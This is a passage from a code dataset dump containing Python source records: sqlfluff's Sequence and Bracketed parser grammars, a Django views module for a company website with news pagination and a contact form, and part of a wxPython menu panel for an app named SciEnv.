\"dimensions\": (100000, 100)},\n \"sample_vectors_one-hot\": {\n \"pickle\": os.path.join(DATA_DIR, \"sample-vectors-one-hot.pickle\"),\n \"dimensions\": (100000, 100),\n },\n}\n","sub_path":"vscvs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"470139198","text":"\"\"\"Sequence and Bracketed Grammars.\"\"\"\n\nfrom typing import Optional, List, Tuple, cast\n\nfrom sqlfluff.core.errors import SQLParseError\n\nfrom sqlfluff.core.parser.segments import (\n BaseSegment,\n Indent,\n Dedent,\n allow_ephemeral,\n BracketedSegment,\n MetaSegment,\n)\nfrom sqlfluff.core.parser.helpers import trim_non_code_segments, check_still_complete\nfrom sqlfluff.core.parser.match_result import MatchResult\nfrom sqlfluff.core.parser.match_wrapper import match_wrapper\nfrom sqlfluff.core.parser.context import ParseContext\nfrom sqlfluff.core.parser.grammar.base import (\n BaseGrammar,\n cached_method_for_parse_context,\n)\nfrom sqlfluff.core.parser.grammar.conditional import Conditional\nfrom os import getenv\n\n\nclass Sequence(BaseGrammar):\n \"\"\"Match a specific sequence of elements.\"\"\"\n\n test_env = getenv(\"SQLFLUFF_TESTENV\", \"\")\n\n @cached_method_for_parse_context\n def simple(self, parse_context: ParseContext, crumbs=None) -> Optional[List[str]]:\n \"\"\"Does this matcher support a uppercase hash matching route?\n\n Sequence does provide this, as long as the *first* non-optional\n element does, *AND* and optional elements which preceded it also do.\n \"\"\"\n simple_buff = []\n for opt in self._elements:\n simple = opt.simple(parse_context=parse_context, crumbs=crumbs)\n if not simple:\n return None\n simple_buff += simple\n\n if not opt.is_optional():\n # We found our first non-optional element!\n return simple_buff\n # If *all* elements are optional AND simple, I guess it's also simple.\n return simple_buff\n\n @match_wrapper()\n @allow_ephemeral\n def match(self, segments, parse_context):\n \"\"\"Match a specific sequence of elements.\"\"\"\n if isinstance(segments, BaseSegment):\n segments = tuple(segments) # pragma: no cover TODO?\n\n matched_segments = MatchResult.from_empty()\n unmatched_segments = segments\n\n # Buffers of uninstantiated meta segments.\n meta_pre_nc = ()\n meta_post_nc = ()\n early_break = False\n\n for idx, elem in enumerate(self._elements):\n # Check for an early break.\n if early_break:\n break\n\n while True:\n # Consume non-code if appropriate\n if self.allow_gaps:\n pre_nc, mid_seg, post_nc = trim_non_code_segments(\n unmatched_segments\n )\n else:\n pre_nc = ()\n mid_seg = unmatched_segments\n post_nc = ()\n\n # Is it an indent or dedent?\n if elem.is_meta:\n # Elements with a negative indent value come AFTER\n # the whitespace. Positive or neutral come BEFORE.\n if elem.indent_val < 0:\n meta_post_nc += (elem(),)\n else:\n meta_pre_nc += (elem(),)\n break\n\n # Is it a conditional? If so is it active\n if isinstance(elem, Conditional) and not elem.is_enabled(parse_context):\n # If it's not active, skip it.\n break\n\n if len(pre_nc + mid_seg + post_nc) == 0:\n # We've run our of sequence without matching everything.\n # Do only optional or meta elements remain?\n if all(\n e.is_optional() or e.is_meta or isinstance(e, Conditional)\n for e in self._elements[idx:]\n ):\n # then it's ok, and we can return what we've got so far.\n # No need to deal with anything left over because we're at the\n # end, unless it's a meta segment.\n\n # We'll add those meta segments after any existing ones. 
So\n # the go on the meta_post_nc stack.\n for e in self._elements[idx:]:\n # If it's meta, instantiate it.\n if e.is_meta:\n meta_post_nc += (e(),) # pragma: no cover TODO?\n # If it's conditional and it's enabled, match it.\n if isinstance(e, Conditional) and e.is_enabled(\n parse_context\n ):\n meta_match = e.match(tuple(), parse_context)\n if meta_match:\n meta_post_nc += meta_match.matched_segments\n\n # Early break to exit via the happy match path.\n early_break = True\n break\n else:\n # we've got to the end of the sequence without matching all\n # required elements.\n return MatchResult.from_unmatched(segments)\n else:\n # We've already dealt with potential whitespace above, so carry on\n # to matching\n with parse_context.deeper_match() as ctx:\n elem_match = elem.match(mid_seg, parse_context=ctx)\n\n if elem_match.has_match():\n # We're expecting mostly partial matches here, but complete\n # matches are possible. Don't be greedy with whitespace!\n matched_segments += (\n meta_pre_nc\n + pre_nc\n + meta_post_nc\n + elem_match.matched_segments\n )\n meta_pre_nc = ()\n meta_post_nc = ()\n unmatched_segments = elem_match.unmatched_segments + post_nc\n # Each time we do this, we do a sense check to make sure we\n # haven't dropped anything. (Because it's happened before!).\n if self.test_env:\n check_still_complete(\n segments,\n matched_segments.matched_segments,\n unmatched_segments,\n )\n # Break out of the while loop and move to the next element.\n break\n else:\n # If we can't match an element, we should ascertain whether it's\n # required. If so then fine, move on, but otherwise we should\n # crash out without a match. We have not matched the sequence.\n if elem.is_optional():\n # This will crash us out of the while loop and move us\n # onto the next matching element\n break\n else:\n return MatchResult.from_unmatched(segments)\n\n # If we get to here, we've matched all of the elements (or skipped them)\n # but still have some segments left (or perhaps have precisely zero left).\n # In either case, we're golden. Return successfully, with any leftovers as\n # the unmatched elements. Meta all go at the end regardless of wny trailing\n # whitespace.\n\n return MatchResult(\n BaseSegment._position_segments(\n matched_segments.matched_segments + meta_pre_nc + meta_post_nc,\n ),\n unmatched_segments,\n )\n\n\nclass Bracketed(Sequence):\n \"\"\"Match if a bracketed sequence, with content that matches one of the elements.\n\n Note that the contents of the Bracketed Expression are treated as an expected\n sequence.\n\n Changelog:\n - Post 0.3.2: Bracketed inherits from Sequence and anything within\n the the `Bracketed()` expression is treated as a sequence. For the\n content of the Brackets, we call the `match()` method of the sequence\n grammar.\n - Post 0.1.0: Bracketed was separate from sequence, and the content\n of the expression were treated as options (like OneOf).\n - Pre 0.1.0: Bracketed inherited from Sequence and simply added\n brackets to that sequence.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Store the bracket type. 
NB: This is only\n # hydrated into segments at runtime.\n self.bracket_type = kwargs.pop(\"bracket_type\", \"round\")\n self.bracket_pairs_set = kwargs.pop(\"bracket_pairs_set\", \"bracket_pairs\")\n # Allow optional override for special bracket-like things\n self.start_bracket = kwargs.pop(\"start_bracket\", None)\n self.end_bracket = kwargs.pop(\"end_bracket\", None)\n super().__init__(*args, **kwargs)\n\n @cached_method_for_parse_context\n def simple(self, parse_context: ParseContext, crumbs=None) -> Optional[List[str]]:\n \"\"\"Does this matcher support a uppercase hash matching route?\n\n Bracketed does this easily, we just look for the bracket.\n \"\"\"\n start_bracket, _, _ = self.get_bracket_from_dialect(parse_context)\n return start_bracket.simple(parse_context=parse_context, crumbs=crumbs)\n\n def get_bracket_from_dialect(self, parse_context):\n \"\"\"Rehydrate the bracket segments in question.\"\"\"\n for bracket_type, start_ref, end_ref, persists in parse_context.dialect.sets(\n self.bracket_pairs_set\n ):\n if bracket_type == self.bracket_type:\n start_bracket = parse_context.dialect.ref(start_ref)\n end_bracket = parse_context.dialect.ref(end_ref)\n break\n else: # pragma: no cover\n raise ValueError(\n \"bracket_type {!r} not found in bracket_pairs of {!r} dialect.\".format(\n self.bracket_type, parse_context.dialect.name\n )\n )\n return start_bracket, end_bracket, persists\n\n @match_wrapper()\n @allow_ephemeral\n def match(\n self, segments: Tuple[\"BaseSegment\", ...], parse_context: ParseContext\n ) -> MatchResult:\n \"\"\"Match if a bracketed sequence, with content that matches one of the elements.\n\n 1. work forwards to find the first bracket.\n If we find something other that whitespace, then fail out.\n 2. Once we have the first bracket, we need to bracket count forward to find its\n partner.\n 3. Assuming we find its partner then we try and match what goes between them\n using the match method of Sequence.\n If we match, great. If not, then we return an empty match.\n If we never find its partner then we return an empty match but should\n probably log a parsing warning, or error?\n\n \"\"\"\n # Trim ends if allowed.\n if self.allow_gaps:\n pre_nc, seg_buff, post_nc = trim_non_code_segments(segments)\n else:\n seg_buff = segments # pragma: no cover TODO?\n\n # Rehydrate the bracket segments in question.\n # bracket_persists controls whether we make a BracketedSegment or not.\n start_bracket, end_bracket, bracket_persists = self.get_bracket_from_dialect(\n parse_context\n )\n # Allow optional override for special bracket-like things\n start_bracket = self.start_bracket or start_bracket\n end_bracket = self.end_bracket or end_bracket\n\n # Are we dealing with a pre-existing BracketSegment?\n if seg_buff[0].is_type(\"bracketed\"):\n # NOTE: We copy the original segment here because otherwise we will begin to\n # edit a _reference_ and not a copy - and that may lead to unused matches\n # leaking out. 
https://github.com/sqlfluff/sqlfluff/issues/3277\n seg: BracketedSegment = cast(BracketedSegment, seg_buff[0].copy())\n # Check it's of the right kind of bracket\n if not start_bracket.match(seg.start_bracket, parse_context):\n # Doesn't match - return no match\n return MatchResult.from_unmatched(segments)\n\n content_segs = seg.segments[len(seg.start_bracket) : -len(seg.end_bracket)]\n bracket_segment = seg\n trailing_segments = seg_buff[1:]\n # Otherwise try and match the segments directly.\n else:\n # Look for the first bracket\n with parse_context.deeper_match() as ctx:\n start_match = start_bracket.match(seg_buff, parse_context=ctx)\n if start_match:\n seg_buff = start_match.unmatched_segments\n else:\n # Can't find the opening bracket. No Match.\n return MatchResult.from_unmatched(segments)\n\n # Look for the closing bracket\n content_segs, end_match, _ = self._bracket_sensitive_look_ahead_match(\n segments=seg_buff,\n matchers=[end_bracket],\n parse_context=parse_context,\n start_bracket=start_bracket,\n end_bracket=end_bracket,\n bracket_pairs_set=self.bracket_pairs_set,\n )\n if not end_match: # pragma: no cover\n raise SQLParseError(\n \"Couldn't find closing bracket for opening bracket.\",\n segment=start_match.matched_segments[0],\n )\n\n # Construct a bracket segment\n bracket_segment = BracketedSegment(\n segments=(\n start_match.matched_segments\n + content_segs\n + end_match.matched_segments\n ),\n start_bracket=start_match.matched_segments,\n end_bracket=end_match.matched_segments,\n )\n trailing_segments = end_match.unmatched_segments\n\n # Then trim whitespace and deal with the case of non-code content e.g. \"( )\"\n if self.allow_gaps:\n pre_segs, content_segs, post_segs = trim_non_code_segments(content_segs)\n else: # pragma: no cover TODO?\n pre_segs = ()\n post_segs = ()\n\n # If we've got a case of empty brackets check whether that is allowed.\n if not content_segs:\n if not self._elements or (\n all(e.is_optional() for e in self._elements)\n and (self.allow_gaps or (not pre_segs and not post_segs))\n ):\n return MatchResult(\n (bracket_segment,)\n if bracket_persists\n else bracket_segment.segments,\n trailing_segments,\n )\n else:\n return MatchResult.from_unmatched(segments)\n\n # Match the content using super. 
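`_bracket_sensitive_look_ahead_match`, used above to locate the closing bracket, lives on BaseGrammar and is not reproduced in this record. Its essential move is the classic depth counter: scan forward, increment on an opener, decrement on a closer, and stop only when the depth returns to zero so nested pairs cannot end the match early. A dialect-free illustration over plain tokens (not sqlfluff's segment API, which also handles mixed bracket types from the configured pairs):

```python
BRACKET_PAIRS = {"(": ")", "[": "]", "{": "}"}

def find_matching_bracket(tokens, open_idx):
    """Index of the closer matching tokens[open_idx], honouring nesting."""
    open_tok = tokens[open_idx]
    close_tok = BRACKET_PAIRS[open_tok]
    depth = 0
    for idx in range(open_idx, len(tokens)):
        if tokens[idx] == open_tok:
            depth += 1
        elif tokens[idx] == close_tok:
            depth -= 1
            if depth == 0:
                return idx
    raise ValueError("couldn't find closing bracket for opening bracket")

tokens = list("a(b(c)d)e")
assert find_matching_bracket(tokens, 1) == 7   # skips the nested (c)
assert find_matching_bracket(tokens, 3) == 5
```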
Sequence will interpret the content of the\n # elements.\n with parse_context.deeper_match() as ctx:\n content_match = super().match(content_segs, parse_context=ctx)\n\n # We require a complete match for the content (hopefully for obvious reasons)\n if content_match.is_complete():\n # Reconstruct the bracket segment post match.\n # We need to realign the meta segments so the pos markers are correct.\n # Have we already got indents?\n meta_idx = None\n for idx, seg in enumerate(bracket_segment.segments):\n if (\n seg.is_meta\n and cast(MetaSegment, seg).indent_val > 0\n and not cast(MetaSegment, seg).is_template\n ):\n meta_idx = idx\n break\n # If we've already got indents, don't add more.\n if meta_idx:\n bracket_segment.segments = BaseSegment._position_segments(\n bracket_segment.start_bracket\n + pre_segs\n + content_match.all_segments()\n + post_segs\n + bracket_segment.end_bracket\n )\n # Append some indent and dedent tokens at the start and the end.\n else:\n bracket_segment.segments = BaseSegment._position_segments(\n # NB: The nc segments go *outside* the indents.\n bracket_segment.start_bracket\n + (Indent(),) # Add a meta indent here\n + pre_segs\n + content_match.all_segments()\n + post_segs\n + (Dedent(),) # Add a meta indent here\n + bracket_segment.end_bracket\n )\n return MatchResult(\n (bracket_segment,) if bracket_persists else bracket_segment.segments,\n trailing_segments,\n )\n # No complete match. Fail.\n else:\n return MatchResult.from_unmatched(segments)\n","sub_path":"src/sqlfluff/core/parser/grammar/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":17109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27713248","text":"#-*- coding: utf-8 -*-\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom django.utils.html import strip_tags\nfrom django.contrib import messages\n\nfrom forms import MessageForm\nfrom models import Page, News\n\nfrom datetime import datetime\nfrom page.forms import DefinitionErrorList\nfrom shop.models import ProductGroup\n\n\ndef render_to(tmpl):\n def renderer(func):\n def wrapper(request, *args, **kw):\n output = func(request, *args, **kw)\n if not isinstance(output, dict):\n return output\n output['settings'] = settings\n return render_to_response(tmpl, output, context_instance=RequestContext(request))\n return wrapper\n return renderer\n\n\n@render_to('index.html')\ndef home(request):\n return {'p': get_object_or_404(Page, url='index'), 'groups': ProductGroup.objects.filter(productgroup=None)}\n\n@render_to('contacts.html')\ndef contacts(request):\n return {'p': get_object_or_404(Page, url='contacts'), 'MAPS_API_KEY': settings.MAPS_API_KEY}\n\n@render_to('search.html')\ndef error404(request):\n return {'p':Page(title=u'Такой страницы не найдено', content=u'Такой страницы не существует. 
Воспользуйтесь поиском по сайту')}\n\n@render_to('search.html')\ndef error403(request):\n return {'p':Page(title=u'Недостаточно прав для совершения операции', content=u'Недостаточно прав для совершения операции.')}\n\n@render_to('search.html')\ndef error500(request):\n return {'p':Page(title=u'Ошибка сервера', content=u'Произошла серверная ошибка.')}\n\n@render_to('search.html')\ndef search(request):\n return {'p':Page.objects.get(url=\"search\"), 'query': request.GET.get('query', ''), 'SEARCH_API_KEY': settings.SEARCH_API_KEY}\n\n@render_to('page.html')\ndef page(request, url):\n return {'p':get_object_or_404(Page, url=url)}\n\n@render_to('newsall.html')\ndef newslist(request, page=1):\n if(page is None):\n page = 1\n else:\n page = int(page)\n paginator = Paginator(News.objects.filter(date__lte=datetime.now()), 5)\n try:\n newspage = paginator.page(page)\n except PageNotAnInteger:\n newspage = paginator.page(1)\n except EmptyPage:\n newspage = paginator.page(paginator.num_pages)\n\n return {\n 'newspage': newspage,\n 'p': Page(title=\"Новости\", url=\"news\"),\n }\n\n@render_to('news.html')\ndef newsread(request, newsdate, url):\n news = get_object_or_404(News, date=newsdate, url=url)\n return {'news':news, \"p\": Page(title=news.title, keywords=news.keywords, meta_description=strip_tags(news.smallcontent))}\n\n@render_to('sitemap.html')\ndef sitemap(request):\n return {'p': get_object_or_404(Page, url='sitemap'),\n \"pages\": Page.objects.all().exclude(url=\"order\"),\n \"groups\": ProductGroup.objects.filter(productgroup=None)}\n\n@render_to('blocks/message-form.html')\ndef message(request):\n if request.method == \"POST\":\n form = MessageForm(request.POST, error_class = DefinitionErrorList)\n if form.is_valid():\n try:\n msg=form.save(commit=False)\n msg.save()\n message = render_to_string('message_email.txt', {'msg':msg})\n send_to = [manager[1] for manager in settings.MANAGERS]\n email = EmailMessage(u\"Сообщение с сайта temp-msk\", message, u'ТЕМП ', send_to)\n email.send()\n messages.success(request, u'Сообщение отправлено специалистам компании')\n return {'form': MessageForm()}\n except :\n messages.error(request, u'При отправке произошла ошибка. 
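On this views.py record: the `render_to` decorator returns a bare `wrapper`, which erases the wrapped view's `__name__`/`__doc__` (confusing in tracebacks and URL introspection), and `render_to_response(..., context_instance=RequestContext(...))` was removed in Django 3.0 in favour of `render`. A modernised sketch of the same decorator:

```python
import functools
from django.shortcuts import render  # replaces the removed render_to_response

def render_to(template):
    """Decorator: the view returns a context dict; render it with `template`."""
    def renderer(func):
        @functools.wraps(func)           # keep the view's name and docstring
        def wrapper(request, *args, **kwargs):
            output = func(request, *args, **kwargs)
            if not isinstance(output, dict):
                return output            # e.g. a redirect passes straight through
            return render(request, template, output)
        return wrapper
    return renderer
```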
Пожалуйста, повторите попытку позднее.')\n else:\n form = MessageForm()\n\n return {'form': form}","sub_path":"page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364873607","text":"import wx\nimport os\n\nfrom ..lib import MenuPanelSwitchButton\nfrom ..lib import ScrolledPanel\nfrom ..lib import SimpleButton\nfrom ..lib import ConfigColorSwitcher\nfrom ..lib import ScaledStaticText\nfrom ..lib import CheckBox\n\nfrom .widgetdescriptors import WidgetsList\n\n\nPATH = __file__.replace('core/menu.py', 'widgets/')\n\n\nclass MenuPanel(wx.Panel):\n \"\"\"Container for menu related panels.\"\"\"\n\n def __init__(self, parent, config, manager):\n super().__init__(parent=parent, name='menu')\n\n self.parent = parent\n self.config = config\n self.manager = manager\n\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n self.sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.buttons = Buttons(self, self.config)\n self.sizer.Add(self.buttons, 0, flag=wx.EXPAND | wx.ALL, border=20)\n self.SetSizer(self.sizer)\n self.Layout()\n\n def show_side_panel(self, idx):\n \"\"\"Shows selected menu panel.\"\"\"\n\n try:\n self.sizer.Detach(self.current_menu)\n self.current_menu.Destroy()\n except:\n pass\n finally:\n if idx == 0:\n self.current_menu = TitleMenu(self, self.config)\n elif idx == 1:\n self.current_menu = OptionsMenu(self, self.config)\n elif idx == 2:\n self.current_menu = WidgetsMenu(\n self, self.config, self.manager)\n\n self.sizer.Add(self.current_menu, proportion=1,\n flag=wx.EXPAND | wx.TOP | wx.BOTTOM | wx.RIGHT, border=20)\n self.Layout()\n\n def button_pressed(self, event):\n \"\"\"Handles button presses.\"\"\"\n\n operation = event.GetEventObject().label\n for switch in self.buttons.GetChildren():\n switch.isActive = False\n event.GetEventObject().isActive = False\n\n if operation == 'Return':\n wx.CallLater(100, self.manager.toggle_menu)\n\n elif operation == 'Quit':\n self.manager.save_widgets()\n wx.CallLater(100, self.parent.Destroy)\n\n elif operation == 'Options':\n\n if isinstance(self.current_menu, OptionsMenu):\n self.show_side_panel(0)\n else:\n event.GetEventObject().isActive = True\n self.show_side_panel(1)\n\n elif operation == 'Widgets':\n if isinstance(self.current_menu, WidgetsMenu):\n self.show_side_panel(0)\n else:\n event.GetEventObject().isActive = True\n self.show_side_panel(2)\n\n def erase_background(self, event):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n dc.SetBackground(wx.Brush(self.config.get_color('panel')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n dc.SetPen(wx.Pen(self.config.get_color('panel'), width=4))\n dc.DrawLine(3, 0, width - 6, 0)\n\n\nclass Buttons(wx.Panel):\n \"\"\"Constantly visible menu selection buttons panel.\"\"\"\n\n def __init__(self, parent, config, **kwargs):\n super(wx.Panel, self).__init__(parent=parent)\n\n self.Name = 'menuPanel'\n self.parent = parent\n self.config = config\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n 
self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n \"\"\"Displays buttons.\"\"\"\n\n self.sizer = wx.GridBagSizer(0, 0)\n butt1 = MenuPanelSwitchButton(\n self, self.config, 'Return', size=(240, 60))\n butt2 = MenuPanelSwitchButton(\n self, self.config, 'Quit', size=(240, 60))\n butt3 = MenuPanelSwitchButton(\n self, self.config, 'Widgets', size=(240, 60))\n butt4 = MenuPanelSwitchButton(\n self, self.config, 'Options', size=(240, 60))\n\n self.sizer.Add(butt3, pos=(0, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt4, pos=(1, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt1, pos=(2, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt2, pos=(4, 0), flag=wx.EXPAND | wx.ALL, border=10)\n self.sizer.AddGrowableRow(3)\n\n self.SetSizer(self.sizer)\n self.Layout()\n\n def button_pressed(self, event):\n \"\"\"Skips all button presses to menu container.\"\"\"\n\n event.Skip()\n\n def erase_background(self, event):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass TitleMenu(wx.Panel):\n \"\"\"Default menu panel, displays application name.\"\"\"\n\n def __init__(self, parent, config):\n super().__init__(parent)\n self.config = config\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n def erase_background(self, event):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n dc.SetFont(wx.Font(50, wx.FONTFAMILY_DECORATIVE,\n wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD))\n dc.SetTextForeground(self.config.get_color('text'))\n\n textWidth, textHeight = dc.GetTextExtent('SciEnv')\n textX = (width - textWidth) // 2\n textY = (height - textHeight) // 3\n\n dc.DrawText('SciEnv', textX, textY)\n\n\nclass OptionsMenu(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent=parent)\n\n self.parent = parent\n self.config = config\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n \"\"\"Displays configuration panel and buttons.\"\"\"\n\n sizer = wx.GridBagSizer()\n self.config_panel = OptionsConfigPanel(self, self.config)\n reset_button = SimpleButton(\n parent=self, config=self.config, label='Reset Settings', size=(40, 40))\n save_button = SimpleButton(\n parent=self, config=self.config, label='Save Changes', size=(40, 40))\n cancel_button = SimpleButton(\n parent=self, config=self.config, label='Cancel', size=(40, 40))\n\n sizer.Add(self.config_panel, pos=(0, 
0), span=(8, 10),\n flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=4)\n sizer.Add(reset_button, pos=(8, 0), span=(1, 3),\n flag=wx.EXPAND | wx.ALL, border=10)\n sizer.Add(cancel_button, pos=(8, 6), span=(1, 2),\n flag=wx.EXPAND | wx.ALL, border=10)\n sizer.Add(save_button, pos=(8, 8), span=(1, 2), flag=wx.EXPAND |\n wx.TOP | wx.BOTTOM | wx.RIGHT, border=10)\n\n for i in range(10):\n sizer.AddGrowableCol(i)\n for i in range(8):\n sizer.AddGrowableRow(i)\n\n self.SetSizer(sizer)\n self.Layout()\n\n def button_pressed(self, e):\n button = e.GetEventObject()\n operation = button.label\n if operation == 'Save Changes':\n self.config = self.config_panel.collect_config(self.config)\n self.config.write_config()\n self.GetParent().GetParent().Refresh()\n self.GetParent().GetParent().Layout()\n elif operation == 'Cancel':\n return\n elif operation == 'Reset Settings':\n return\n\n def erase_background(self, e):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n width, height = self.GetClientSize()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass OptionsConfigPanel(ScrolledPanel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n self.config = config\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n self.display()\n self.setup_scrolling(scroll_x=False)\n\n def display(self):\n \"\"\"Handles display.\"\"\"\n\n sizer = wx.GridBagSizer()\n\n header = ScaledStaticText(self,\n label='Settings',\n font=self.config.get_font('large'),\n conf=self.config)\n text1 = ScaledStaticText(self,\n label='Theme: ',\n font=self.config.get_font('medium'),\n conf=self.config)\n self.theme_selection = wx.Choice(self,\n choices=self.config.get_theme_list(),\n size=(120, 40))\n add_themes = SimpleButton(self,\n label='Add New Theme',\n config=self.config,\n size=(120, 40))\n\n self.save_widgets = CheckBox(\n self, 'Save Widgets//On Exit', self.config.save_widgets_on_exit, self.config)\n\n text2 = ScaledStaticText(self,\n label='Small Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n text3 = ScaledStaticText(self,\n label='Medium Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n text4 = ScaledStaticText(self,\n label='Large Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n\n self.font_picker_small = wx.FontPickerCtrl(\n self, font=self.config.get_font('small'), size=(200, 40))\n self.font_picker_medium = wx.FontPickerCtrl(\n self, font=self.config.get_font('medium'), size=(200, 40))\n self.font_picker_large = wx.FontPickerCtrl(\n self, font=self.config.get_font('large'), size=(200, 40))\n self.font_picker_small.SetBackgroundColour(\n self.config.get_color('menu'))\n self.font_picker_medium.SetBackgroundColour(\n self.config.get_color('menu'))\n self.font_picker_large.SetBackgroundColour(\n self.config.get_color('menu'))\n\n for index, theme in enumerate(self.theme_selection.GetItems()):\n if theme == self.config.get_current_theme():\n self.theme_selection.SetSelection(index)\n break\n\n sizer.Add(header, pos=(0, 0), span=(1, 2),\n flag=wx.EXPAND | wx.ALL, border=60)\n sizer.Add(text1, pos=(1, 0), 
flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(self.theme_selection, pos=(1, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(add_themes, pos=(2, 1), flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add((-1, 60), pos=(3, 0), span=(1, 2), flag=wx.EXPAND)\n sizer.Add(text2, pos=(4, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(text3, pos=(5, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(text4, pos=(6, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(self.font_picker_small, pos=(4, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(self.font_picker_medium, pos=(5, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(self.font_picker_large, pos=(6, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add((-1, 60), pos=(7, 0), span=(1, 2), flag=wx.EXPAND)\n sizer.Add(self.save_widgets, pos=(8, 0), flag=wx.EXPAND)\n\n for i in range(2):\n sizer.AddGrowableCol(i)\n\n self.SetSizer(sizer)\n self.Layout()\n\n def collect_config(self, config):\n \"\"\"Collects all the configuration across the panels' children.\"\"\"\n\n config._config.set('General', 'Theme', self.theme_selection.GetString(\n self.theme_selection.GetSelection()))\n do_save_widgets = 'yes' if self.save_widgets.value else 'no'\n config._config.set('General', 'savewidgetsonexit', do_save_widgets)\n small_font = self.font_picker_small.GetSelectedFont()\n medium_font = self.font_picker_medium.GetSelectedFont()\n large_font = self.font_picker_large.GetSelectedFont()\n config.set_font('Small Font',\n small_font.GetPointSize(),\n small_font.GetFamily(),\n small_font.GetStyle(),\n small_font.GetWeight())\n config.set_font('Medium Font',\n medium_font.GetPointSize(),\n medium_font.GetFamily(),\n medium_font.GetStyle(),\n medium_font.GetWeight())\n config.set_font('Large Font',\n large_font.GetPointSize(),\n large_font.GetFamily(),\n large_font.GetStyle(),\n large_font.GetWeight())\n return config\n\n def erase_background(self, e):\n \"\"\"Remove flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n 